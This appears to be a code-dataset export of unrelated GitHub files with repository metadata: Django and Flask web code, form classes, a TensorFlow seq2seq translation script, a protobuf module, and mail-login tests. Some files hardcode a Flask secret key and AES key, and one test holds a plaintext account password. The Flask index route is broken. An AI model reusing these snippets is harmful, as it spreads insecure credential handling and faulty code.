class RestaurantList(generics.ListAPIView):
queryset = Restaurant.objects.all()
serializer_class = RestaurantSerializer
class RatingCreate(generics.CreateAPIView):
serializer_class = RatingSerializer
|
[
"hjalti@syndis.is"
] |
hjalti@syndis.is
|
6dd3d7603490a5f2fdf91d1d397aeaca760bcf15
|
c68670233d27ed9c8be58df8f177b7ba047d5762
|
/ETF/bank/regression-testing/ETF_Test_Parameters.py
|
ae64a0f7b353bfc295dd028b8afc60d37a1b8eb7
|
[] |
no_license
|
chrisboyd/3311_Software_Design
|
cddb0a35aea5b24a37a3485263774af5af20acca
|
0f2103440199847644b360db2e4da680cc055b25
|
refs/heads/master
| 2022-04-12T20:43:44.344652
| 2020-04-05T14:33:19
| 2020-04-05T14:33:19
| 236,079,001
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,976
|
py
|
#!/usr/bin/env python3
# Specify the directory (relative or absolute) where the acceptance test
# files are. If nothing is added, current directory is used.
# WARNING: While absolute paths are suported, the oracle may not play nicely
# with them.
root = "../tests"
# Specify files or directories (relative to root) of the acceptance tests.
# NOTE: Tests can not be named test.expected.txt
# NOTE: To run all tests in root directory, uses [""] as the test.
# WARNING: Does not support partial file names with wildcards ie at*.txt
acceptance_tests = [
"acceptance/instructor",
"acceptance/student"
]
# acceptance_tests = ["acceptance-tests/at00.txt"
# ,"acceptance-tests/at01.txt"]
# Should regression testing continue on warnings? If this is set to False,
# regression testing will exit.
ignore_warnings = True
# Should the regression testing proceed with a list of expected files, or the
# oracle?
# When this flag is set True, the the value of 'oracle' is ignored.
is_expected = False
# Specify where you put the oracle.
oracle = "../oracle.exe"
# Specify the path of the executable built from your project.
executable = "../EIFGENs/bank/W_code/bank"
# The above is an OSX executable
# Linux executable for students shaler be called: oracle.exe
# Should the program only print tests that do not pass
print_only_errors = True
# Should the program format the output so it could easily be diffed:
# examples include "meld", "diff -y", etc.
# If left blank will format output in a generic way
format_for_diff = "meld"
# Set true if you want the comparison to be tolerant on white spaces and empty
# lines.
# WARNING: While every attempt has been made to make the output return the same
# result as the grading script, there are no guarantees. It is strongly advised
# that you submit a program that passes with the flag set to False.
is_tolerant_on_white_spaces = False
|
[
"chrisboyd360@gmail.com"
] |
chrisboyd360@gmail.com
|
d0197e1460b1523cbdd200578cad1bcb1e586cd2
|
ecc658489d9b99228964f55e19674619bdd07e34
|
/models/forms.py
|
831b13a7fdea52189e69ec4d7d98e7a9574f444c
|
[] |
no_license
|
nkhanhng/test
|
d211feafb8c3ae75262565d676851681517e2d2f
|
40e68eac8a57d8767a2794ec01a6ac2efe433960
|
refs/heads/master
| 2021-09-10T22:27:11.658235
| 2018-04-03T11:27:12
| 2018-04-03T11:27:12
| 126,017,972
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
py
|
from wtforms import Form, StringField, SelectField
class ProductSearchForm(Form):
choices = [('Brand', 'Brand'),
('Product', 'Product'),]
select = SelectField('Tìm kiếm điện thoại:', choices=choices)
search = StringField('')
|
[
"khanhmatden123@gmail.com"
] |
khanhmatden123@gmail.com
|
8f1fbeb8067359a027901401c270d62040d1f6b2
|
aa3f2ce318c57d7ba44a4465342915a9c40ec812
|
/socialauthapp/profile.py
|
cdb08a818bbe245bf0eb92c32e4a4a243e514d5f
|
[
"BSD-2-Clause-Views"
] |
permissive
|
vencax/feincms-auth-app
|
25f7b59183c3cba8cf0aaffe85b1990b301ae724
|
ba4fad4b7dd0c58311aac791ec462c814e8f7660
|
refs/heads/master
| 2021-01-01T18:47:56.492396
| 2012-06-28T12:08:50
| 2012-06-28T12:08:50
| 4,223,398
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,230
|
py
|
'''
Created on Jun 18, 2012
@author: vencax
'''
from django import forms
from django.contrib.auth.forms import UserChangeForm
from django.contrib.auth.models import User
class MyUserChangeForm(forms.ModelForm):
class Meta(UserChangeForm.Meta):
model = User
fields = ('username', 'first_name', 'last_name', 'email',)
class ProfileEditForm(object):
_forms = set()
@classmethod
def register_form(self, form):
self._forms.add(form)
def __init__(self, **kwargs):
self._instances = []
self._addInstance(MyUserChangeForm, **kwargs)
for fClass in self._forms:
self._addInstance(fClass, **kwargs)
def _addInstance(self, fClass, **kwargs):
rec = (fClass._meta.model._meta.verbose_name,
fClass(**dict(kwargs)))
self._instances.append(rec)
def get_forms(self):
return self._instances
def is_valid(self):
valid = True
for _, f in self._instances:
fval = f.is_valid()
if valid and not fval:
valid = False
return valid
def save(self):
for _, f in self._instances:
f.save()
|
[
"vencax77@gmail.com"
] |
vencax77@gmail.com
|
c528f1a96a884ed2425f1c35dfcff713356953d5
|
afa4e8d5d99f968c0429b2ec2712221008139130
|
/bin/pip
|
6593de6f958534a5c93de0f85b3889680af86f88
|
[] |
no_license
|
Delboy82/relayboard_googleassistant
|
a291996c6a2957139081f1a9bfc4248795e7ee24
|
5c4328e5deb0ba5570538f4bc7c7f1cede8a6cd7
|
refs/heads/master
| 2023-01-01T23:27:20.190600
| 2020-11-01T10:31:44
| 2020-11-01T10:31:44
| 309,069,805
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
#!/home/pi/projects/googleassistant/relayboard_google/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"Richardbarton82@hotmail.com"
] |
Richardbarton82@hotmail.com
|
|
97968f80ad7c70241d93fc92dbf9851e963caad3
|
05ef7c8bda9af31dbb23824750e5eb420fba3522
|
/renders/ValueStatistic.py
|
2715b07fc5dfe482c3990529052a5a8b9a955ab6
|
[] |
no_license
|
drianclark/api-wrapper-generator
|
86f68c294554cc67e5fdef6e491cde7c0a9349cc
|
c07b0ff26ac018c416dcfae347f0a91ea69dc18c
|
refs/heads/master
| 2022-12-02T19:43:29.622879
| 2020-08-25T17:07:36
| 2020-08-25T17:07:36
| 279,889,605
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 584
|
py
|
class ValueStatistic:
def __init__(self, dict):
for k, v in dict.items():
setattr(self, "_" + k, v)
keys = list(dict.keys())
try:
self._id = dict["@id"]
except:
pass
def label(self):
try:
value = self._label
except AttributeError:
value = None
return value
def label(self):
try:
value = self._label
except AttributeError:
value = None
return value
|
[
"dreiclark@gmail.com"
] |
dreiclark@gmail.com
|
1c3fd6d04e52d2914fd4bc5213d8805313a85793
|
5bd4289ce406b2a390dde8a11effd1959680a271
|
/trans.py
|
281f457929009c688d254c7dd44b23d81df1113e
|
[] |
no_license
|
appleboys/Tensorflow2.0_cmntoEng_byJiLinCheng
|
9cdf3b760b9d9efc90620ba810335b51f59682cb
|
e929463f12c5a20a63b5f5f941f2f27eeef581d1
|
refs/heads/main
| 2023-05-02T17:34:08.789697
| 2021-05-13T16:29:39
| 2021-05-13T16:29:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,908
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from sklearn.model_selection import train_test_split
import unicodedata
import re
import numpy as np
import os
import io
import time
# 下载文件
path_to_zip = tf.keras.utils.get_file(
'spa-eng.zip', origin='http://storage.googleapis.com/download.tensorflow.org/data/spa-eng.zip',
extract=True)
path_to_file = os.path.dirname(path_to_zip) + "/spa-eng/spa.txt"
# 将 unicode 文件转换为 ascii
def unicode_to_ascii(s):
return ''.join(c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn')
def preprocess_sentence(w):
w = unicode_to_ascii(w.lower().strip())
# 在单词与跟在其后的标点符号之间插入一个空格
# 例如: "he is a boy." => "he is a boy ."
# 参考:https://stackoverflow.com/questions/3645931/python-padding-punctuation-with-white-spaces-keeping-punctuation
w = re.sub(r"([?.!,¿])", r" \1 ", w)
w = re.sub(r'[" "]+', " ", w)
# 除了 (a-z, A-Z, ".", "?", "!", ","),将所有字符替换为空格
w = re.sub(r"[^a-zA-Z?.!,¿]+", " ", w)
w = w.rstrip().strip()
# 给句子加上开始和结束标记
# 以便模型知道何时开始和结束预测
w = '<start> ' + w + ' <end>'
print(w)
return w
en_sentence = u"May I borrow this book?"
sp_sentence = u"¿Puedo tomar prestado este libro?"
print(preprocess_sentence(en_sentence))
print(preprocess_sentence(sp_sentence).encode('utf-8'))
# 1. 去除重音符号
# 2. 清理句子
# 3. 返回这样格式的单词对:[ENGLISH, SPANISH]
def create_dataset(path, num_examples):
lines = io.open(path, encoding='UTF-8').read().strip().split('\n')
word_pairs = [[preprocess_sentence(w) for w in l.split('\t')] for l in lines[:num_examples]]
return zip(*word_pairs)
def max_length(tensor):
return max(len(t) for t in tensor)
def tokenize(lang):
lang_tokenizer = tf.keras.preprocessing.text.Tokenizer(
filters='')
lang_tokenizer.fit_on_texts(lang)
tensor = lang_tokenizer.texts_to_sequences(lang)
tensor = tf.keras.preprocessing.sequence.pad_sequences(tensor,
padding='post')
return tensor, lang_tokenizer
def load_dataset(path, num_examples=None):
# 创建清理过的输入输出对
targ_lang, inp_lang = create_dataset(path, num_examples)
input_tensor, inp_lang_tokenizer = tokenize(inp_lang)
target_tensor, targ_lang_tokenizer = tokenize(targ_lang)
return input_tensor, target_tensor, inp_lang_tokenizer, targ_lang_tokenizer
# 尝试实验不同大小的数据集
num_examples = 10000
input_tensor, target_tensor, inp_lang, targ_lang = load_dataset(path_to_file, num_examples)
# 计算目标张量的最大长度 (max_length)
max_length_targ, max_length_inp = max_length(target_tensor), max_length(input_tensor)
# 采用 80 - 20 的比例切分训练集和验证集------------------------提问!1.验证集与测试集28划分2.图像凹 3.1e-08与现在的1e-07保留小数4.tranc---------------------
input_tensor_train, input_tensor_val, target_tensor_train, target_tensor_val = train_test_split(input_tensor,target_tensor,test_size=0.2)
BUFFER_SIZE=len(input_tensor_train)
BATCH_SIZE = 64
steps_per_epoch = len(input_tensor_train) // BATCH_SIZE
embedding_dim = 256
units = 1024
vocab_inp_size = len(inp_lang.word_index) + 1
vocab_tar_size = len(targ_lang.word_index) + 1
dataset = tf.data.Dataset.from_tensor_slices((input_tensor_train, target_tensor_train)).shuffle(BUFFER_SIZE)
dataset = dataset.batch(BATCH_SIZE, drop_remainder=True)
class Encoder(tf.keras.Model):
def __init__(self, vocab_size, embedding_dim, enc_units, batch_sz):
super(Encoder, self).__init__()
self.batch_sz = batch_sz
self.enc_units = enc_units
self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)
self.gru = tf.keras.layers.GRU(self.enc_units,
return_sequences=True,
return_state=True,
recurrent_initializer='glorot_uniform')
def call(self, x, hidden):
x = self.embedding(x)
output, state = self.gru(x, initial_state=hidden)
return output, state
def initialize_hidden_state(self):
return tf.zeros((self.batch_sz, self.enc_units))
encoder = Encoder(vocab_inp_size, embedding_dim, units, BATCH_SIZE)
class BahdanauAttention(tf.keras.layers.Layer):
def __init__(self, units):
super(BahdanauAttention, self).__init__()
self.W1 = tf.keras.layers.Dense(units)
self.W2 = tf.keras.layers.Dense(units)
self.V = tf.keras.layers.Dense(1)
def call(self, query, values):
# 隐藏层的形状 == (批大小,隐藏层大小)
# hidden_with_time_axis 的形状 == (批大小,1,隐藏层大小)
# 这样做是为了执行加法以计算分数
hidden_with_time_axis = tf.expand_dims(query, 1)
# 分数的形状 == (批大小,最大长度,1)
# 我们在最后一个轴上得到 1, 因为我们把分数应用于 self.V
# 在应用 self.V 之前,张量的形状是(批大小,最大长度,单位)
score = self.V(tf.nn.tanh(
self.W1(values) + self.W2(hidden_with_time_axis)))
# 注意力权重 (attention_weights) 的形状 == (批大小,最大长度,1)
attention_weights = tf.nn.softmax(score, axis=1)
# 上下文向量 (context_vector) 求和之后的形状 == (批大小,隐藏层大小)
context_vector = attention_weights * values
context_vector = tf.reduce_sum(context_vector, axis=1)
return context_vector, attention_weights
attention_layer = BahdanauAttention(10)
class Decoder(tf.keras.Model):
def __init__(self, vocab_size, embedding_dim, dec_units, batch_sz):
super(Decoder, self).__init__()
self.batch_sz = batch_sz
self.dec_units = dec_units
self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)
self.gru = tf.keras.layers.GRU(self.dec_units,
return_sequences=True,
return_state=True,
recurrent_initializer='glorot_uniform')
self.fc = tf.keras.layers.Dense(vocab_size)
# 用于注意力
self.attention = BahdanauAttention(self.dec_units)
def call(self, x, hidden, enc_output):
# 编码器输出 (enc_output) 的形状 == (批大小,最大长度,隐藏层大小)
context_vector, attention_weights = self.attention(hidden, enc_output)
# x 在通过嵌入层后的形状 == (批大小,1,嵌入维度)
x = self.embedding(x)
# x 在拼接 (concatenation) 后的形状 == (批大小,1,嵌入维度 + 隐藏层大小)
x = tf.concat([tf.expand_dims(context_vector, 1), x], axis=-1)
# 将合并后的向量传送到 GRU
output, state = self.gru(x)
# 输出的形状 == (批大小 * 1,隐藏层大小)
output = tf.reshape(output, (-1, output.shape[2]))
# 输出的形状 == (批大小,vocab)
x = self.fc(output)
return x, state, attention_weights
decoder = Decoder(vocab_tar_size, embedding_dim, units, BATCH_SIZE)
optimizer = tf.keras.optimizers.Adam()
loss_object = tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True, reduction='none')
def loss_function(real, pred):
mask = tf.math.logical_not(tf.math.equal(real, 0))
loss_ = loss_object(real, pred)
mask = tf.cast(mask, dtype=loss_.dtype)
loss_ *= mask
return tf.reduce_mean(loss_)
checkpoint_dir = './training_checkpoints'
checkpoint_prefix = os.path.join(checkpoint_dir, "ckpt")
checkpoint = tf.train.Checkpoint(optimizer=optimizer,
encoder=encoder,
decoder=decoder)
@tf.function
def train_step(inp, targ, enc_hidden):
loss = 0
with tf.GradientTape() as tape:
enc_output, enc_hidden = encoder(inp, enc_hidden)
dec_hidden = enc_hidden
dec_input = tf.expand_dims([targ_lang.word_index['<start>']] * BATCH_SIZE, 1)
# 教师强制 - 将目标词作为下一个输入
for t in range(1, targ.shape[1]):
# 将编码器输出 (enc_output) 传送至解码器
predictions, dec_hidden, _ = decoder(dec_input, dec_hidden, enc_output)
loss += loss_function(targ[:, t], predictions)
# 使用教师强制
dec_input = tf.expand_dims(targ[:, t], 1)
batch_loss = (loss / int(targ.shape[1]))
variables = encoder.trainable_variables + decoder.trainable_variables
gradients = tape.gradient(loss, variables)
optimizer.apply_gradients(zip(gradients, variables))
return batch_loss
EPOCHS = 1
for epoch in range(EPOCHS):
start = time.time()
enc_hidden = encoder.initialize_hidden_state()
total_loss = 0
for (batch, (inp, targ)) in enumerate(dataset.take(steps_per_epoch)):
batch_loss = train_step(inp, targ, enc_hidden)
total_loss += batch_loss
if batch % 100 == 0:
print('Epoch {} Batch {} Loss {:.4f}'.format(epoch + 1,
batch,
batch_loss.numpy()))
# 每 2 个周期(epoch),保存(检查点)一次模型
if (epoch + 1) % 2 == 0:
checkpoint.save(file_prefix=checkpoint_prefix)
print('Epoch {} Loss {:.4f}'.format(epoch + 1,
total_loss / steps_per_epoch))
print('Time taken for 1 epoch {} sec\n'.format(time.time() - start))
def evaluate(sentence):
attention_plot = np.zeros((max_length_targ, max_length_inp))
sentence = preprocess_sentence(sentence)
inputs = [inp_lang.word_index[i] for i in sentence.split(' ')]
inputs = tf.keras.preprocessing.sequence.pad_sequences([inputs],
maxlen=max_length_inp,
padding='post')
inputs = tf.convert_to_tensor(inputs)
result = ''
hidden = [tf.zeros((1, units))]
enc_out, enc_hidden = encoder(inputs, hidden)
dec_hidden = enc_hidden
dec_input = tf.expand_dims([targ_lang.word_index['<start>']], 0)
for t in range(max_length_targ):
predictions, dec_hidden, attention_weights = decoder(dec_input,
dec_hidden,
enc_out)
# 存储注意力权重以便后面制图
attention_weights = tf.reshape(attention_weights, (-1,))
attention_plot[t] = attention_weights.numpy()
predicted_id = tf.argmax(predictions[0]).numpy()
result += targ_lang.index_word[predicted_id] + ' '
if targ_lang.index_word[predicted_id] == '<end>':
return result, sentence, attention_plot
# 预测的 ID 被输送回模型
dec_input = tf.expand_dims([predicted_id], 0)
return result, sentence, attention_plot
# 注意力权重制图函数
def plot_attention(attention, sentence, predicted_sentence):
fig = plt.figure(figsize=(10, 10))
ax = fig.add_subplot(1, 1, 1)
ax.matshow(attention, cmap='viridis')
fontdict = {'fontsize': 14}
ax.set_xticklabels([''] + sentence, fontdict=fontdict, rotation=90)
ax.set_yticklabels([''] + predicted_sentence, fontdict=fontdict)
ax.xaxis.set_major_locator(ticker.MultipleLocator(1))
ax.yaxis.set_major_locator(ticker.MultipleLocator(1))
plt.show()
def translate(sentence):
result, sentence, attention_plot = evaluate(sentence)
print('Input: %s' % (sentence))
print('Predicted translation: {}'.format(result))
attention_plot = attention_plot[:len(result.split(' ')), :len(sentence.split(' '))]
plot_attention(attention_plot, sentence.split(' '), result.split(' '))
# 恢复检查点目录 (checkpoint_dir) 中最新的检查点
checkpoint.restore(tf.train.latest_checkpoint(checkpoint_dir))
translate(u'hace mucho frio aqui.')
|
[
"noreply@github.com"
] |
appleboys.noreply@github.com
|
95931f9ff837861dd3298283478b4a6c2446d4f3
|
204178b68dfeabbca5a76cf72c6c7a4bcbf26dab
|
/flask_server/app.py
|
c3c51023bd8be79227fd41e776d0c5ae1e635f26
|
[] |
no_license
|
Ex1Kx/Ex1-FlaskTRM2.py
|
a43b6c891bb0c5bb3493c87e27e4b610aae2f8bc
|
9c608d301301843476881d686f00d73135ff3fc1
|
refs/heads/main
| 2023-07-14T23:41:48.112671
| 2021-09-03T01:12:55
| 2021-09-03T01:12:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,992
|
py
|
from flask import Flask, render_template, request, redirect, url_for, flash
from flask_sqlalchemy import SQLAlchemy
from werkzeug.security import generate_password_hash, check_password_hash
import os
dbdir = "sqlite:///" + os.path.abspath(os.getcwd()) + "/database.db"
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = dbdir
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db = SQLAlchemy(app)
app.secret_key = 'mysecretkey'
class Users(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(50), unique=True, nullable=False)
password = db.Column(db.String(80), nullable=False)
@app.route("/")
def index():
cur = dbdir.cursor()
cur.execute('SELECT * FROM users')
data = cur.fetchall()
print (data)
return render_template("signup.html", users = data)
@app.route("/search")
def search():
nickname = request.args.get("nickname")
user = Users.query.filter_by(username=nickname).first()
if user:
return user.username
return "The user doesn't exist."
@app.route("/signup", methods=["GET", "POST"])
def signup():
if request.method == "POST":
hashed_pw = generate_password_hash(request.form["password"], method="sha256")
new_user = Users(username=request.form["username"], password=hashed_pw)
db.session.add(new_user)
db.session.commit()
flash('Usuario Agregado Correctamente')
return redirect(url_for('signup'))
return render_template("signup.html")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
user = Users.query.filter_by(username=request.form["username"]).first()
if user and check_password_hash(user.password, request.form["password"]):
return "You are logged in"
return "Your credentials are invalid, check and try again."
return render_template("login.html")
if __name__ == "__main__":
db.create_all()
app.run(debug=True)
|
[
"thenewestekigoh@gmail.com"
] |
thenewestekigoh@gmail.com
|
ca21bf850beefb3934635ee99e0c24163174986b
|
721406d87f5086cfa0ab8335a936ece839ab2451
|
/.venv/lib/python3.8/site-packages/google/type/fraction_pb2.py
|
23c8a91166b2febb0275a80633674e20bc07d681
|
[
"MIT"
] |
permissive
|
MarkusMeyer13/graph-teams-presence
|
661296b763fe9e204fe1e057e8bd6ff215ab3936
|
c302b79248f31623a1b209e098afc4f85d96228d
|
refs/heads/main
| 2023-07-09T03:34:57.344692
| 2021-07-29T07:16:45
| 2021-07-29T07:16:45
| 389,268,821
| 0
| 0
|
MIT
| 2021-07-29T07:16:46
| 2021-07-25T05:23:08
|
Python
|
UTF-8
|
Python
| false
| false
| 3,785
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/type/fraction.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/type/fraction.proto",
package="google.type",
syntax="proto3",
serialized_options=b"\n\017com.google.typeB\rFractionProtoP\001Z<google.golang.org/genproto/googleapis/type/fraction;fraction\242\002\003GTP",
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x1agoogle/type/fraction.proto\x12\x0bgoogle.type"2\n\x08\x46raction\x12\x11\n\tnumerator\x18\x01 \x01(\x03\x12\x13\n\x0b\x64\x65nominator\x18\x02 \x01(\x03\x42\x66\n\x0f\x63om.google.typeB\rFractionProtoP\x01Z<google.golang.org/genproto/googleapis/type/fraction;fraction\xa2\x02\x03GTPb\x06proto3',
)
_FRACTION = _descriptor.Descriptor(
name="Fraction",
full_name="google.type.Fraction",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="numerator",
full_name="google.type.Fraction.numerator",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="denominator",
full_name="google.type.Fraction.denominator",
index=1,
number=2,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=43,
serialized_end=93,
)
DESCRIPTOR.message_types_by_name["Fraction"] = _FRACTION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Fraction = _reflection.GeneratedProtocolMessageType(
"Fraction",
(_message.Message,),
{
"DESCRIPTOR": _FRACTION,
"__module__": "google.type.fraction_pb2"
# @@protoc_insertion_point(class_scope:google.type.Fraction)
},
)
_sym_db.RegisterMessage(Fraction)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
[
"meyer_markus@gmx.de"
] |
meyer_markus@gmx.de
|
4dbeff0828108da4e1337513163cf9ff4231ef57
|
a4751186e3c99ae0a12229334e732eba268b76aa
|
/tmp/decryp.py
|
d9224dcc73b56d78141b138e2086e019bf4baabb
|
[] |
no_license
|
ben-ginsberg/ben-ginsberg
|
6d55305b5f071fbffd755e9e9e7b24269683af34
|
c8007107ddf4109abf374335201bdbda0b494d7c
|
refs/heads/master
| 2020-06-06T23:15:11.639873
| 2015-09-17T05:56:47
| 2015-09-17T05:56:47
| 42,637,870
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 654
|
py
|
from Crypto.Cipher import AES
from urllib import unquote
import sys
import string
# We've already created encryption_object as shown above
def decrypt(ciphUrl):
encryption_obj = AES.new('hewillneverguess')
ciphUrlArr = string.split(ciphUrl,'/')
ciph = unquote(ciphUrlArr[-1])
mediaId = encryption_obj.decrypt(ciph)
#print mediaId
#print len(mediaId)
mediaId = mediaId.replace(' ','')
#print mediaId
#print len(mediaId)
ciphUrlArr[-1] = mediaId
orgUrl = string.join(ciphUrlArr,'/')
print orgUrl
return orgUrl
if __name__ == "__main__":
if len(sys.argv)>2:
exit(0)
decrypt(sys.argv[1])
|
[
"ben.ginsberg29@gmail.com"
] |
ben.ginsberg29@gmail.com
|
73518650174055c9de5bee32806a47e90f61251c
|
c1519f09d483d37eea9f1e4be5dfd9b8ccd03d57
|
/Python_for_Finance/7_10_yahoo_oahl.py
|
1a73357203c97e6d41180abb9ecc35ea304ebe72
|
[] |
no_license
|
yf8848/Python_code
|
97cfdd846e9be804fb7828362d900679d594f210
|
de72e479c6dc25ff325d5a4641c3fcf477d321dd
|
refs/heads/master
| 2020-03-23T21:58:01.280757
| 2019-02-28T09:00:37
| 2019-02-28T09:00:37
| 142,144,045
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
#!/bin/env python
import datetime
import matplotlib.mpl_finance as finance
import matplotlib.mlab as mlab
ticker = 'IBM'
d1 = datetime.date(2013,1,1)
d2 = datetime.date.today()
price = finance.fetch_historical_yahoo_ochl(ticker, d1, d2)
r = mlab.csv2rec(price)
price.close()
r.sort()
|
[
"1071380275@qq.com"
] |
1071380275@qq.com
|
93e99e88b4ba20f442cb177c7c51fdbdd79bcb3a
|
57ee1e45ff781a824b93c68adaeb4b0a6a1a980a
|
/Mission_to_Mars_files/app.py
|
4904b0eab26b9f52e62bf071c2cd89f1572951e1
|
[] |
no_license
|
rlau929/Mission-to-Mars
|
7e1fcac36afe698a1ef203f6824f8da6e2907094
|
bd7e53f8b23b009c69b577128a2d5c8b2325f2b7
|
refs/heads/master
| 2022-11-20T23:59:58.226923
| 2020-07-20T03:08:11
| 2020-07-20T03:08:11
| 279,430,270
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 579
|
py
|
from flask import Flask, render_template
from flask_pymongo import PyMongo
import scraping
app = Flask(__name__)
# Use flask_pymongo to set up mongo connection
app.config["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
@app.route("/")
def index():
mars = mongo.db.mars.find_one()
return render_template("index.html", mars=mars)
@app.route("/scrape")
def scrape():
mars = mongo.db.mars
mars_data = scraping.scrape_all()
mars.update({}, mars_data, upsert=True)
return "Scraping Successful!"
if __name__ == "__main__":
app.run()
|
[
"rlau929@gmail.com"
] |
rlau929@gmail.com
|
2dc3a76984646c94c1e0806754687b6a25b9b58b
|
045bf2b36eefb081bea34362432b1959b4495654
|
/tests/test_phrase_model.py
|
5230048d0e9a7e882c1c1c11bccde527beed526a
|
[] |
no_license
|
soaxelbrooke/text_tools
|
6d7fea693e81e1b29a937bed2115ffa285cca2fc
|
275c89f439611c01ddc964c70c1504f430c39ef2
|
refs/heads/master
| 2021-06-09T03:00:15.252765
| 2016-10-26T07:02:37
| 2016-10-26T07:02:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,196
|
py
|
from text_tools import train_phrase_model, apply_phrase_models
from gensim.models import Phrases
def test_phrase_model():
texts = [
"This is how we do it. You know it's friday night, and I feel all right, and party's here on the west side.",
"Homies said yo I don't",
"Cuz it's Friday, Friday, gotta get down on friday. Everyone's looking forward to the weekend, weekend."
]
model = train_phrase_model(texts)
assert model is not None
assert model.vocab[b'this'] > 0
def test_multi_phrase_model():
texts = [
"This is how we do it. You know it's friday night, and I feel all right, and party's here on the west side.",
"Homies said yo I don't",
"Cuz it's Friday, Friday, gotta get down on friday. Everyone's looking forward to the weekend, weekend."
]
models = train_phrase_model(texts, 3)
assert len(models) == 3
for model in models:
assert isinstance(model, Phrases)
assert model.vocab[b'this'] > 0
phrased = list(apply_phrase_models(models, texts))
# Make sure applying phrase models works, that it returns a stream of token lists
assert isinstance(phrased[0], list)
|
[
"stuart@axelbrooke.com"
] |
stuart@axelbrooke.com
|
41c926449608057341f1109c06395da1a5e01fd4
|
5e1bfb7a3ec7c39810988e898c5cae6a8e142e55
|
/tests/test_mail.py
|
f266e183c47efbf26079721a3e952c8bac4e56a3
|
[] |
no_license
|
Ksenia12k/marktek_test
|
f729e9c82e1e0c0d659f8c4fb0eecdfaa7f7a31a
|
5d62b11c6576d3b1dbab4efab74f45ed28802297
|
refs/heads/master
| 2023-03-14T21:13:30.343916
| 2021-03-12T11:47:20
| 2021-03-12T11:47:20
| 347,046,540
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,523
|
py
|
from ..steps.create_letter_form_steps import CreateLetterFormSteps
from ..steps.letters_list_steps import LettersListSteps
from ..steps.inbox_menu_steps import InboxMenuSteps
from ..steps.captcha_steps import CaptchaSteps
from ..steps.base_steps import BaseSteps
from ..steps.main_steps import MainSteps
from ..steps.signup_steps import SignupSteps
def test_create_new_mail_user(app):
base_steps = BaseSteps(app)
main_steps = MainSteps(app)
signup_steps = SignupSteps(app)
captcha_steps = CaptchaSteps(app)
base_steps.open_page_step(app.base_url)
main_steps.open_signup_form_step()
signup_steps.fill_in_signup_form_step("TestName", "TestLastName", "Male", "testEmail", "krYojtEU31I|")
captcha_steps.check_captcha_is_visible_step()
def test_send_email(app):
base_steps = BaseSteps(app)
main_steps = MainSteps(app)
inbox_menu_steps = InboxMenuSteps(app)
create_letter_form_steps = CreateLetterFormSteps(app)
letters_list_steps = LettersListSteps(app)
base_steps.open_page_step(app.base_url)
main_steps.login_step("test_marktek", "&ryPTPenrO24")
inbox_menu_steps.click_create_new_letter_btn_step()
letter_text = create_letter_form_steps.send_letter_step("test_marktek@mail.ru", "Test")
create_letter_form_steps.check_letter_sent_popup_step()
inbox_menu_steps.open_menu_item_step("Входящие")
inbox_menu_steps.expand_letters_block_step("Письма себе")
letters_list_steps.check_new_letter_is_in_list_step(letter_text)
|
[
"kkuznetsova@sdvor.com"
] |
